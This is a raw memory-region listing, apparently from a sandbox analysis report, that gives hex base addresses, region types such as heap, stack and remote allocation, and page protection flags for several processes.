page read and write
8710000
heap
page read and write
4931000
heap
page read and write
BF0000
unkown
page readonly
79E1000
heap
page read and write
2E70000
direct allocation
page read and write
1BEB1FE000
stack
page read and write
4C40000
trusted library allocation
page read and write
1B66CD31000
heap
page read and write
4931000
heap
page read and write
D47000
unkown
page read and write
4931000
heap
page read and write
1B66CC25000
heap
page read and write
352C000
heap
page read and write
B1521FF000
stack
page read and write
4931000
heap
page read and write
3342000
heap
page read and write
4931000
heap
page read and write
1CB6F620000
heap
page read and write
1B66AECD000
heap
page read and write
4931000
heap
page read and write
1B66CD8B000
heap
page read and write
1B66CD58000
heap
page read and write
1CB005A7000
trusted library allocation
page read and write
2818A1C0000
heap
page read and write
4931000
heap
page read and write
1B66B118000
heap
page read and write
7CDA8CE000
stack
page read and write
1B66CCAD000
heap
page read and write
1B66CD91000
heap
page read and write
6356000
remote allocation
page execute and read and write
8600000
heap
page read and write
2220F000
stack
page read and write
3160000
heap
page read and write
7A70000
trusted library allocation
page read and write
4931000
heap
page read and write
56A4000
unclassified section
page read and write
1B0000
unkown
page readonly
1B66CF3A000
heap
page read and write
55E0000
heap
page read and write
4C78000
trusted library allocation
page read and write
84CD000
stack
page read and write
1B66CEB0000
heap
page read and write
7ED2000
heap
page read and write
7F8C000
heap
page read and write
85F4000
heap
page read and write
1B66CC0D000
heap
page read and write
83CC000
stack
page read and write
4931000
heap
page read and write
7F03000
heap
page read and write
4931000
heap
page read and write
281BDD9F000
heap
page read and write
1298000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
85CF000
stack
page read and write
880F000
stack
page read and write
1BE000
unkown
page readonly
1B66CC20000
heap
page read and write
1B66CDB5000
heap
page read and write
5737000
unkown
page execute and read and write
11A6000
system
page execute and read and write
6A4B000
heap
page read and write
70F0000
trusted library allocation
page execute and read and write
1B66CD87000
heap
page read and write
1CB00082000
trusted library allocation
page read and write
840000
heap
page read and write
2EE4000
heap
page read and write
1B66CD62000
heap
page read and write
311E000
stack
page read and write
1B66CC77000
heap
page read and write
1031000
unkown
page readonly
72D5000
heap
page execute and read and write
73F0000
direct allocation
page read and write
2BC0000
heap
page read and write
4931000
heap
page read and write
1B66CD8B000
heap
page read and write
7900000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
4931000
heap
page read and write
1CB0203D000
trusted library allocation
page read and write
890000
heap
page read and write
7CD9A7E000
stack
page read and write
37D0000
unkown
page execute and read and write
752E000
stack
page read and write
73C0000
direct allocation
page read and write
6A39000
heap
page read and write
8D00000
direct allocation
page read and write
8CF0000
direct allocation
page read and write
1B66CDEB000
heap
page read and write
4D1E000
stack
page read and write
7EDF000
heap
page read and write
7F45000
heap
page read and write
1B1000
unkown
page execute read
7811000
heap
page read and write
1B66CC66000
heap
page read and write
1B66AF8E000
heap
page read and write
4931000
heap
page read and write
1B66B119000
heap
page read and write
1647F7E000
stack
page read and write
4931000
heap
page read and write
5E17000
trusted library allocation
page read and write
1B66CC7F000
heap
page read and write
1BEB3FF000
stack
page read and write
4931000
heap
page read and write
1B66D177000
heap
page read and write
1B66CD80000
heap
page read and write
1B66CDBB000
heap
page read and write
79E7000
heap
page read and write
4931000
heap
page read and write
1B66CD58000
heap
page read and write
30F8000
heap
page read and write
2208E000
stack
page read and write
1B66CC83000
heap
page read and write
1B66D0D0000
remote allocation
page read and write
281BDD7A000
heap
page read and write
1CB014DF000
trusted library allocation
page read and write
71DE000
stack
page read and write
4931000
heap
page read and write
22371000
heap
page read and write
281BF7E0000
heap
page read and write
4931000
heap
page read and write
1B66AF08000
heap
page read and write
1CB711C0000
heap
page execute and read and write
4931000
heap
page read and write
1B66CF21000
heap
page read and write
4931000
heap
page read and write
7F1F000
heap
page read and write
4931000
heap
page read and write
73E0000
direct allocation
page read and write
4931000
heap
page read and write
1BEB7FF000
stack
page read and write
4931000
heap
page read and write
1B66AF4F000
heap
page read and write
BD0000
unkown
page readonly
7FF848EBC000
trusted library allocation
page execute and read and write
4931000
heap
page read and write
1B66CC22000
heap
page read and write
B1519FE000
stack
page read and write
7FF848FB1000
trusted library allocation
page read and write
1B66CF66000
heap
page read and write
8870000
trusted library allocation
page read and write
7FF848E10000
trusted library allocation
page read and write
1CB10001000
trusted library allocation
page read and write
12F134B0000
heap
page read and write
7FF849190000
trusted library allocation
page read and write
2C46000
heap
page read and write
4931000
heap
page read and write
1B66CD8B000
heap
page read and write
87C0000
trusted library allocation
page execute and read and write
1CB71676000
heap
page execute and read and write
F00000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7C9000
stack
page read and write
2FFE000
stack
page read and write
4931000
heap
page read and write
7FF849160000
trusted library allocation
page read and write
77EE000
stack
page read and write
1B66CC2A000
heap
page read and write
2E5E000
stack
page read and write
6A54000
heap
page read and write
2C51000
heap
page read and write
772E000
stack
page read and write
21C60000
direct allocation
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
6A4B000
heap
page read and write
6A5A000
heap
page read and write
6B64000
heap
page read and write
23420000
unclassified section
page execute and read and write
1B66AE60000
heap
page read and write
7FA0000
heap
page read and write
2CA8000
stack
page read and write
4DB1000
trusted library allocation
page read and write
7C1E000
stack
page read and write
1B66CD5F000
heap
page read and write
4931000
heap
page read and write
6A4B000
heap
page read and write
1B66CEE1000
heap
page read and write
54DF000
stack
page read and write
4931000
heap
page read and write
1B66CCA8000
heap
page read and write
52BC000
unclassified section
page read and write
1B66CDEC000
heap
page read and write
281BF620000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1CB6F790000
heap
page readonly
3420000
trusted library section
page read and write
3A94000
remote allocation
page execute and read and write
4AE0000
trusted library allocation
page execute and read and write
6A6E000
heap
page read and write
6D10000
direct allocation
page read and write
4920000
heap
page read and write
281BDC20000
system
page execute and read and write
281BFA01000
trusted library allocation
page read and write
32EA000
heap
page read and write
4931000
heap
page read and write
844D000
stack
page read and write
1B66CC5E000
heap
page read and write
756A000
stack
page read and write
577F000
stack
page read and write
2B3F000
unknown
page read and write
4931000
heap
page read and write
10C0000
unknown
page read and write
1BEBAFB000
stack
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1CB102F9000
trusted library allocation
page read and write
2818A2C0000
heap
page read and write
4931000
heap
page read and write
2BB0000
heap
page read and write
1B66CEBD000
heap
page read and write
4C60000
heap
page readonly
7FF849080000
trusted library allocation
page read and write
807E000
stack
page read and write
1CB00943000
trusted library allocation
page read and write
6D40000
direct allocation
page read and write
1CB6F8F5000
heap
page read and write
6CBE000
stack
page read and write
489B000
stack
page read and write
75E0000
heap
page read and write
7FF8490A0000
trusted library allocation
page read and write
8A64000
heap
page read and write
6D70000
heap
page read and write
4931000
heap
page read and write
721E000
stack
page read and write
4BD0000
unknown
page execute and read and write
5956000
remote allocation
page execute and read and write
1B66CCB3000
heap
page read and write
1B66CDBA000
heap
page read and write
1B66CC56000
heap
page read and write
1B0000
unknown
page readonly
281BDD30000
heap
page read and write
7967000
heap
page read and write
1B66CEB2000
heap
page read and write
1B66CDEF000
heap
page read and write
1CB6F6B3000
heap
page read and write
1B66CDBB000
heap
page read and write
1B66CD7E000
heap
page read and write
7F65000
heap
page read and write
6C7E000
stack
page read and write
4931000
heap
page read and write
1031000
unknown
page readonly
1B66AF89000
heap
page read and write
2DC0000
heap
page read and write
69E8000
heap
page read and write
12F13090000
heap
page read and write
2210D000
stack
page read and write
4810000
heap
page read and write
D4D000
unknown
page read and write
1B66CD52000
heap
page read and write
4931000
heap
page read and write
69E0000
heap
page read and write
1CB10011000
trusted library allocation
page read and write
1B66CC1D000
heap
page read and write
1B66AF88000
heap
page read and write
1B66CC63000
heap
page read and write
1CB005A5000
trusted library allocation
page read and write
6B30000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1B66CC1D000
heap
page read and write
10F0000
heap
page read and write
4C90000
direct allocation
page execute and read and write
12F14C10000
heap
page read and write
1B66CCBB000
heap
page read and write
1B66CF20000
heap
page read and write
1CB01389000
trusted library allocation
page read and write
1B66CC2E000
heap
page read and write
1B66CDBB000
heap
page read and write
3335000
heap
page read and write
7FF848E04000
trusted library allocation
page read and write
2DBF000
stack
page read and write
1B66CC0B000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7CD9DFF000
stack
page read and write
B9A000
stack
page read and write
6A54000
heap
page read and write
1B66AF88000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7CDAA4B000
stack
page read and write
1B66CF1C000
heap
page read and write
2264D000
heap
page read and write
1B66CFBD000
heap
page read and write
2C72000
heap
page read and write
4F8F000
stack
page read and write
2E9E000
stack
page read and write
1B66CDE2000
heap
page read and write
4931000
heap
page read and write
7FF848E03000
trusted library allocation
page execute and read and write
4931000
heap
page read and write
4931000
heap
page read and write
22496000
heap
page read and write
227F9000
direct allocation
page execute and read and write
8A78000
heap
page read and write
2C6B000
stack
page read and write
4931000
heap
page read and write
1B1000
unknown
page execute read
4931000
heap
page read and write
22A20000
unclassified section
page execute and read and write
86B7000
stack
page read and write
1CB01E84000
trusted library allocation
page read and write
3020000
heap
page read and write
7CD96FE000
stack
page read and write
4C90000
heap
page execute and read and write
1CB71670000
heap
page execute and read and write
4931000
heap
page read and write
77AE000
stack
page read and write
329E000
stack
page read and write
4931000
heap
page read and write
2C53000
heap
page read and write
1B66B115000
heap
page read and write
719E000
stack
page read and write
1B66CD8D000
heap
page read and write
1CB009BB000
trusted library allocation
page read and write
1CB71622000
heap
page read and write
73D0000
direct allocation
page read and write
1B66CDEF000
heap
page read and write
B10000
unknown
page readonly
1B66CDF0000
heap
page read and write
C834000
direct allocation
page execute and read and write
4931000
heap
page read and write
5E9C000
system
page read and write
1B66CD87000
heap
page read and write
6A0D000
heap
page read and write
1B66CDEB000
heap
page read and write
1B66CCB2000
heap
page read and write
2BCC000
heap
page read and write
1B66CD46000
heap
page read and write
50FC000
unclassified section
page read and write
1B66CC5B000
heap
page read and write
6A55000
heap
page read and write
1647EFF000
stack
page read and write
1B66CC9B000
heap
page read and write
281BF903000
trusted library allocation
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
6A5B000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
335E000
stack
page read and write
281BF90E000
trusted library allocation
page read and write
B10000
unknown
page readonly
281BFAC4000
trusted library allocation
page read and write
4931000
heap
page read and write
4D5C000
stack
page read and write
1B66AF2D000
heap
page read and write
1B66AF52000
heap
page read and write
1B66CD87000
heap
page read and write
1B66CDEF000
heap
page read and write
1B66CD8D000
heap
page read and write
7FF848E02000
trusted library allocation
page read and write
7EE4000
heap
page read and write
2EC0000
heap
page read and write
1B66CDEF000
heap
page read and write
1B66CDA6000
heap
page read and write
22520000
heap
page read and write
1B66CDEB000
heap
page read and write
1B66CED1000
heap
page read and write
7FF849050000
trusted library allocation
page read and write
1B66CD76000
heap
page read and write
7B00000
trusted library allocation
page read and write
1CB6F840000
trusted library allocation
page read and write
281BDC80000
system
page execute and read and write
549E000
stack
page read and write
1CB715B1000
heap
page read and write
7FAD000
heap
page read and write
330F000
stack
page read and write
4A30000
trusted library allocation
page read and write
7CD997E000
stack
page read and write
2DD0000
unknown
page execute and read and write
7CD987C000
stack
page read and write
1B66CF31000
heap
page read and write
4931000
heap
page read and write
7EED000
heap
page read and write
6B50000
heap
page readonly
6A0E000
heap
page read and write
48C0000
trusted library allocation
page read and write
3430000
trusted library allocation
page read and write
281BF921000
trusted library allocation
page read and write
1B66CD87000
heap
page read and write
4931000
heap
page read and write
899B000
stack
page read and write
1B66CDC7000
heap
page read and write
34D0000
heap
page read and write
1B66CDC7000
heap
page read and write
3525000
heap
page read and write
7D2B000
stack
page read and write
8860000
trusted library allocation
page execute and read and write
1B66CDBB000
heap
page read and write
6D00000
direct allocation
page read and write
D4A000
unknown
page read and write
3490000
heap
page read and write
1B66CDD8000
heap
page read and write
4931000
heap
page read and write
7907000
trusted library allocation
page read and write
1B66CD01000
heap
page read and write
4931000
heap
page read and write
21C40000
direct allocation
page read and write
1CB009B3000
trusted library allocation
page read and write
7FF848FE2000
trusted library allocation
page read and write
1B66CC3D000
heap
page read and write
2286E000
direct allocation
page execute and read and write
3042000
heap
page read and write
1CB6F8F0000
heap
page read and write
2EE4000
heap
page read and write
4DBD000
direct allocation
page execute and read and write
7CD99FE000
stack
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1CB02051000
trusted library allocation
page read and write
1CB6F5D0000
heap
page read and write
7100000
trusted library allocation
page read and write
760000
heap
page read and write
8D10000
direct allocation
page read and write
4931000
heap
page read and write
7FF849100000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
2E70000
direct allocation
page read and write
1B66CDBB000
heap
page read and write
332C000
heap
page read and write
835000
heap
page read and write
2DBE000
stack
page read and write
4CDE000
stack
page read and write
1B66CC12000
heap
page read and write
7FF8490B0000
trusted library allocation
page read and write
1CB01E80000
trusted library allocation
page read and write
5CDC000
system
page read and write
1CB02036000
trusted library allocation
page read and write
1B66CD0A000
heap
page read and write
1CB71710000
heap
page read and write
850E000
stack
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1CB71AC0000
heap
page read and write
4931000
heap
page read and write
7420000
direct allocation
page read and write
86F0000
trusted library allocation
page read and write
4FE2000
unclassified section
page read and write
4931000
heap
page read and write
226D0000
direct allocation
page execute and read and write
895C000
stack
page read and write
21C30000
direct allocation
page read and write
1B66CC20000
heap
page read and write
1B66CC6E000
heap
page read and write
7FF849110000
trusted library allocation
page read and write
4931000
heap
page read and write
86C0000
heap
page read and write
7EE9000
heap
page read and write
12AE000
heap
page read and write
1B66CDFA000
heap
page read and write
5BC2000
system
page read and write
1B66AF82000
heap
page read and write
7AB0000
trusted library allocation
page read and write
4931000
heap
page read and write
1CB71210000
heap
page execute and read and write
6A22000
heap
page read and write
2D40000
heap
page read and write
48C0000
trusted library allocation
page read and write
3DBB2000
system
page read and write
4931000
heap
page read and write
4F61000
direct allocation
page execute and read and write
1B66AF88000
heap
page read and write
729E000
stack
page read and write
1B66CC15000
heap
page read and write
281BF640000
trusted library allocation
page read and write
2818A33B000
heap
page read and write
EFC000
stack
page read and write
7CD967E000
stack
page read and write
1B66CDC7000
heap
page read and write
573E000
stack
page read and write
4C7F000
heap
page read and write
1B66CD7E000
heap
page read and write
1B66CDEF000
heap
page read and write
8C8E000
stack
page read and write
229A1000
direct allocation
page execute and read and write
12AF000
unknown
page read and write
128E000
stack
page read and write
8A4B000
heap
page read and write
4931000
heap
page read and write
2F70000
trusted library allocation
page read and write
4931000
heap
page read and write
6A49000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
4FD2000
direct allocation
page execute and read and write
1B66CC8B000
heap
page read and write
605B000
trusted library allocation
page read and write
281BDD9B000
heap
page read and write
72D0000
heap
page execute and read and write
10A0000
unknown
page readonly
7B5D000
stack
page read and write
5C82000
system
page read and write
79FE000
heap
page read and write
9634000
direct allocation
page execute and read and write
4931000
heap
page read and write
6A49000
heap
page read and write
2EA0000
heap
page read and write
22649000
heap
page read and write
7CDA84E000
stack
page read and write
281BF912000
trusted library allocation
page read and write
1B66CDC7000
heap
page read and write
1B66AF6F000
heap
page read and write
85E7000
heap
page read and write
7AE0000
heap
page execute and read and write
7FF849170000
trusted library allocation
page read and write
7FF848F20000
trusted library allocation
page execute and read and write
1BEAD69000
stack
page read and write
50D000
stack
page read and write
1CB01E20000
trusted library allocation
page read and write
4931000
heap
page read and write
1B66CD88000
heap
page read and write
4931000
heap
page read and write
220CE000
stack
page read and write
6284000
system
page read and write
1B66CC1A000
heap
page read and write
1B66CCB8000
heap
page read and write
1B66CD5A000
heap
page read and write
22371000
heap
page read and write
3DC72000
system
page read and write
33EE000
stack
page read and write
1B66AE90000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1B66B11A000
heap
page read and write
4931000
heap
page read and write
1B66CC1F000
heap
page read and write
B30000
unknown
page readonly
303C000
stack
page read and write
7CD9E7C000
stack
page read and write
1CB01CA3000
trusted library allocation
page read and write
1B66CEC0000
heap
page read and write
7FE4000
heap
page read and write
1B66CDE4000
heap
page read and write
2DC0000
heap
page read and write
4931000
heap
page read and write
5DC1000
trusted library allocation
page read and write
33F0000
heap
page read and write
85FD000
heap
page read and write
2A3E000
unknown
page read and write
4931000
heap
page read and write
7A30000
trusted library allocation
page read and write
7F0B000
heap
page read and write
281BF800000
trusted library allocation
page read and write
1B66AF18000
heap
page read and write
4930000
heap
page read and write
7C5D000
stack
page read and write
7FF849040000
trusted library allocation
page read and write
1B66CDCA000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
48C0000
trusted library allocation
page read and write
7FF849090000
trusted library allocation
page read and write
1B66CEC0000
heap
page read and write
2EE4000
heap
page read and write
6A50000
heap
page read and write
1CB6F624000
heap
page read and write
335B000
heap
page read and write
4931000
heap
page read and write
8CCE000
stack
page read and write
7A40000
trusted library allocation
page read and write
1CB6F71A000
heap
page read and write
4931000
heap
page read and write
1390000
unknown
page readonly
307D000
stack
page read and write
4931000
heap
page read and write
7F4A000
heap
page read and write
1B66CC0E000
heap
page read and write
1B66CDC7000
heap
page read and write
1CB6F4D0000
heap
page read and write
2F6F000
stack
page read and write
2EE0000
heap
page read and write
1CB71563000
heap
page read and write
493B000
heap
page read and write
7400000
direct allocation
page read and write
50A2000
unclassified section
page read and write
3472000
trusted library allocation
page read and write
3037000
heap
page read and write
2EE4000
heap
page read and write
1B66CDFE000
heap
page read and write
1B66CEB8000
heap
page read and write
4931000
heap
page read and write
7FF849020000
trusted library allocation
page read and write
1B66CD8D000
heap
page read and write
500C000
stack
page read and write
1CB6F810000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
1B66CD87000
heap
page read and write
7932000
heap
page read and write
4931000
heap
page read and write
79F4000
heap
page read and write
2818A430000
heap
page read and write
2C49000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1BEB4FF000
stack
page read and write
1CB02145000
trusted library allocation
page read and write
124C000
stack
page read and write
B9A000
stack
page read and write
3310000
heap
page read and write
4931000
heap
page read and write
8A80000
heap
page read and write
22A12000
direct allocation
page execute and read and write
1B66CD87000
heap
page read and write
1B66CC35000
heap
page read and write
1B66AF7D000
heap
page read and write
877E000
stack
page read and write
2EE4000
heap
page read and write
7CDA94D000
stack
page read and write
74AA000
stack
page read and write
4931000
heap
page read and write
1B66CD8D000
heap
page read and write
32DE000
heap
page read and write
1B66CD5B000
heap
page read and write
4931000
heap
page read and write
7F7C000
heap
page read and write
1B66CC2D000
heap
page read and write
495E000
stack
page read and write
1B66CDD5000
heap
page read and write
3180000
heap
page read and write
AA34000
direct allocation
page execute and read and write
1B66CEC0000
heap
page read and write
4931000
heap
page read and write
2DC4000
heap
page read and write
281BDD7F000
heap
page read and write
4931000
heap
page read and write
1721000
unknown
page readonly
1B66CD54000
heap
page read and write
2236C000
stack
page read and write
8820000
trusted library allocation
page read and write
1B66AF4F000
heap
page read and write
8D30000
direct allocation
page read and write
2F0B000
stack
page read and write
B20000
unknown
page readonly
7CD0000
trusted library allocation
page read and write
4931000
heap
page read and write
4E10000
trusted library allocation
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
349A000
heap
page read and write
1B66CD48000
heap
page read and write
10C0000
unknown
page read and write
1B66CD91000
heap
page read and write
1B66CF67000
heap
page read and write
1B66CCA3000
heap
page read and write
1B66CDD5000
heap
page read and write
1CB71631000
heap
page read and write
4931000
heap
page read and write
1B66CC02000
heap
page read and write
1B66CC4B000
heap
page read and write
6A22000
heap
page read and write
4931000
heap
page read and write
1B66AF59000
heap
page read and write
2B30000
unknown
page readonly
1B66CDE8000
heap
page read and write
1B66AEBD000
heap
page read and write
1B66CDBB000
heap
page read and write
1B66AEB9000
heap
page read and write
1CB01C2C000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
1B66CF35000
heap
page read and write
1CB6F630000
heap
page read and write
1C5000
unknown
page read and write
736D000
stack
page read and write
3078000
stack
page read and write
7FF848E0D000
trusted library allocation
page execute and read and write
7FF848E5C000
trusted library allocation
page execute and read and write
3028000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7FF8490D0000
trusted library allocation
page read and write
6D60000
direct allocation
page read and write
7A60000
trusted library allocation
page read and write
4931000
heap
page read and write
3B56000
remote allocation
page execute and read and write
4931000
heap
page read and write
1CB718B0000
heap
page read and write
7AF0000
trusted library allocation
page read and write
4931000
heap
page read and write
1CB6F660000
trusted library allocation
page read and write
8A20000
heap
page read and write
1B66CDBB000
heap
page read and write
1CB6F75B000
heap
page read and write
60D000
stack
page read and write
1B66CC15000
heap
page read and write
1B66CF9B000
heap
page read and write
6A49000
heap
page read and write
281BDDA2000
heap
page read and write
1B66CD53000
heap
page read and write
7942000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1B66CDAE000
heap
page read and write
227FD000
direct allocation
page execute and read and write
8080000
trusted library allocation
page read and write
4F56000
remote allocation
page execute and read and write
F768AFF000
stack
page read and write
1B66CD8B000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1B66CF35000
heap
page read and write
1B66CCA0000
heap
page read and write
6B60000
heap
page read and write
1B66CDBC000
heap
page read and write
4931000
heap
page read and write
1B66D0D0000
remote allocation
page read and write
1BEB5FB000
stack
page read and write
4931000
heap
page read and write
7CD977E000
stack
page read and write
2E30000
direct allocation
page read and write
1B66CD0A000
heap
page read and write
344D000
trusted library allocation
page execute and read and write
2232B000
stack
page read and write
7C70000
trusted library allocation
page read and write
4931000
heap
page read and write
1B66CC46000
heap
page read and write
1B66CDD8000
heap
page read and write
1B66CEF2000
heap
page read and write
1BEB0FE000
stack
page read and write
5BD3000
system
page read and write
1B66CDAB000
heap
page read and write
25319000
unclassified section
page execute and read and write
4931000
heap
page read and write
1CB6F690000
heap
page read and write
4931000
heap
page read and write
6A42000
heap
page read and write
7984000
heap
page read and write
1CB718BF000
heap
page read and write
4931000
heap
page read and write
3459000
trusted library allocation
page read and write
1BEB6FC000
stack
page read and write
1B66CC5B000
heap
page read and write
1B66AEBE000
heap
page read and write
7F3D000
heap
page read and write
1B66CEBA000
heap
page read and write
1B66CD8D000
heap
page read and write
4931000
heap
page read and write
85F0000
heap
page read and write
4931000
heap
page read and write
1B66CF93000
heap
page read and write
4931000
heap
page read and write
890F000
stack
page read and write
4931000
heap
page read and write
4C7C000
stack
page read and write
B1509FE000
stack
page read and write
8A6C000
heap
page read and write
1721000
unknown
page readonly
4931000
heap
page read and write
4FF3000
unclassified section
page read and write
48D9000
stack
page read and write
23E20000
unclassified section
page execute and read and write
4931000
heap
page read and write
1B66CF95000
heap
page read and write
1CB1000F000
trusted library allocation
page read and write
7FF848FF0000
trusted library allocation
page execute and read and write
2214B000
stack
page read and write
7CD98FF000
stack
page read and write
1B66B110000
heap
page read and write
353A000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1CB715CA000
heap
page read and write
12F13070000
heap
page read and write
4BCD000
stack
page read and write
1B66B0A0000
heap
page read and write
4F04000
trusted library allocation
page read and write
33A0000
heap
page read and write
2818A330000
heap
page read and write
32B0000
heap
page read and write
3187000
heap
page read and write
B20000
unknown
page readonly
221CE000
stack
page read and write
7AD0000
trusted library allocation
page read and write
8CE0000
trusted library allocation
page read and write
4931000
heap
page read and write
1B66CC29000
heap
page read and write
1B66CC93000
heap
page read and write
1B66CDF1000
heap
page read and write
12CE000
unknown
page read and write
3450000
trusted library allocation
page read and write
6D20000
direct allocation
page read and write
1B66CC12000
heap
page read and write
7FF849180000
trusted library allocation
page read and write
1CB718C9000
heap
page read and write
7EFE000
heap
page read and write
1B66CFB1000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
4556000
remote allocation
page execute and read and write
2818A530000
heap
page read and write
7C60000
trusted library allocation
page read and write
7FF849010000
trusted library allocation
page read and write
75F9000
heap
page read and write
2204F000
stack
page read and write
1B66D0D0000
remote allocation
page read and write
4931000
heap
page read and write
1CB01AB5000
trusted library allocation
page read and write
55C8000
trusted library allocation
page read and write
4931000
heap
page read and write
1CB71816000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
7A47000
trusted library allocation
page read and write
B434000
direct allocation
page execute and read and write
7910000
heap
page read and write
1040000
unknown
page read and write
1B66CD91000
heap
page read and write
1CB006F9000
trusted library allocation
page read and write
7FBB000
heap
page read and write
1B66CC42000
heap
page read and write
535E000
stack
page read and write
1B66CDF7000
heap
page read and write
1B66CD8F000
heap
page read and write
7FF849130000
trusted library allocation
page read and write
86D0000
trusted library allocation
page execute and read and write
4931000
heap
page read and write
1B66CDC7000
heap
page read and write
1B66CEC0000
heap
page read and write
4931000
heap
page read and write
101E000
unknown
page read and write
2C20000
heap
page read and write
4931000
heap
page read and write
10A0000
unknown
page readonly
4931000
heap
page read and write
BF0000
unknown
page readonly
281BFACE000
trusted library allocation
page read and write
1B66CDD3000
heap
page read and write
545E000
stack
page read and write
7DF496C00000
trusted library allocation
page execute and read and write
281BF640000
trusted library allocation
page read and write
7B10000
trusted library allocation
page read and write
2DC4000
heap
page read and write
7FF849030000
trusted library allocation
page read and write
3444000
trusted library allocation
page read and write
1B66B118000
heap
page read and write
1B66CDCE000
heap
page read and write
3037000
heap
page read and write
4C0E000
stack
page read and write
7F51000
heap
page read and write
1B66AF4F000
heap
page read and write
4931000
heap
page read and write
30D0000
heap
page read and write
2DC0000
heap
page read and write
1B66B11E000
heap
page read and write
1B66CDBB000
heap
page read and write
87D0000
trusted library allocation
page read and write
7FF8490E0000
trusted library allocation
page read and write
6CFF000
stack
page read and write
1B66CDD8000
heap
page read and write
1CB6F800000
heap
page read and write
7BDE000
stack
page read and write
2B7E000
stack
page read and write
1B66CC53000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
11A8000
system
page execute and read and write
4931000
heap
page read and write
2225E000
stack
page read and write
1B66CDC7000
heap
page read and write
1B66CD91000
heap
page read and write
4931000
heap
page read and write
491C000
stack
page read and write
1CB717F0000
heap
page read and write
4FCC000
stack
page read and write
830000
heap
page read and write
1B66AF65000
heap
page read and write
79F9000
heap
page read and write
4931000
heap
page read and write
1B66CD7E000
heap
page read and write
4931000
heap
page read and write
4AE1000
heap
page read and write
1B66CC4E000
heap
page read and write
6A10000
heap
page read and write
539E000
stack
page read and write
7FF849150000
trusted library allocation
page read and write
4931000
heap
page read and write
1B66CDBB000
heap
page read and write
1BEB8FF000
stack
page read and write
3105000
heap
page read and write
1CB6F6DD000
heap
page read and write
1CB10309000
trusted library allocation
page read and write
1B66CC46000
heap
page read and write
4931000
heap
page read and write
1B66CF30000
heap
page read and write
1B66CD91000
heap
page read and write
6A55000
heap
page read and write
4931000
heap
page read and write
339E000
stack
page read and write
F7688FD000
stack
page read and write
1B66AE99000
heap
page read and write
7AC0000
trusted library allocation
page execute and read and write
1B66CC90000
heap
page read and write
F7689FF000
unknown
page read and write
1B66CD32000
heap
page read and write
7F29000
heap
page read and write
7CD97FE000
stack
page read and write
7FF848FC0000
trusted library allocation
page execute and read and write
BE0000
unknown
page readonly
1B66CD48000
heap
page read and write
49E0000
heap
page read and write
281BF900000
trusted library allocation
page read and write
3101000
heap
page read and write
85ED000
heap
page read and write
1B66CDB6000
heap
page read and write
7FF848EB0000
trusted library allocation
page read and write
5DB1000
trusted library allocation
page read and write
746E000
stack
page read and write
2EE4000
heap
page read and write
1CB71560000
heap
page read and write
4931000
heap
page read and write
22370000
heap
page read and write
2818A534000
heap
page read and write
7FF8490C0000
trusted library allocation
page read and write
89DE000
stack
page read and write
5DD9000
trusted library allocation
page read and write
BE34000
direct allocation
page execute and read and write
7CD9AFE000
stack
page read and write
1390000
unknown
page readonly
56C9000
unknown
page execute and read and write
25387000
unclassified section
page execute and read and write
7CD93EE000
stack
page read and write
8700000
heap
page read and write
4931000
heap
page read and write
1B66CD8D000
heap
page read and write
6A6E000
heap
page read and write
3475000
trusted library allocation
page execute and read and write
1B66D101000
heap
page read and write
73B0000
direct allocation
page read and write
4931000
heap
page read and write
2C00000
heap
page read and write
8D50000
direct allocation
page read and write
281BFAAA000
trusted library allocation
page read and write
1B66CDEB000
heap
page read and write
3E274000
system
page read and write
4931000
heap
page read and write
F00000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1B66CC7A000
heap
page read and write
1B66CC88000
heap
page read and write
4931000
heap
page read and write
1B66CED1000
heap
page read and write
1B66CF1C000
heap
page read and write
4931000
heap
page read and write
4931000
heap
page read and write
1180000
system
page execute and read and write
4DAE000
stack
page read and write
4931000
heap
page read and write
3DE8C000
system
page read and write
1B66CC3A000
heap
page read and write
4C50000
heap
page read and write
1B66AF7A000
heap
page read and write
4931000
heap
page read and write
4F30000
heap
page read and write
7CDA9CB000
stack
page read and write
1B66CD87000
heap
page read and write
85FA000
heap
page read and write
73AB000
stack
page read and write
41D0000
unkown
page execute and read and write
281BDD8C000
heap
page read and write
7A04000
heap
page read and write
1B66AEB8000
heap
page read and write
680000
heap
page read and write
6D50000
direct allocation
page read and write
1CB7185E000
heap
page read and write
1B66CDC7000
heap
page read and write
1C7000
unkown
page readonly
88D000
stack
page read and write
1B66CDBA000
heap
page read and write
4931000
heap
page read and write
2F2E000
stack
page read and write
1B66CF10000
heap
page read and write
85E0000
heap
page read and write
7FF849070000
trusted library allocation
page read and write
4850000
heap
page read and write
1B66B11C000
heap
page read and write
7FF848EE6000
trusted library allocation
page execute and read and write
848D000
stack
page read and write
7CB0000
trusted library allocation
page read and write
1B66CEB9000
heap
page read and write
1B66CC32000
heap
page read and write
7FF848E1B000
trusted library allocation
page read and write
34E8000
heap
page read and write
2E70000
direct allocation
page read and write
776F000
stack
page read and write
B1501FB000
stack
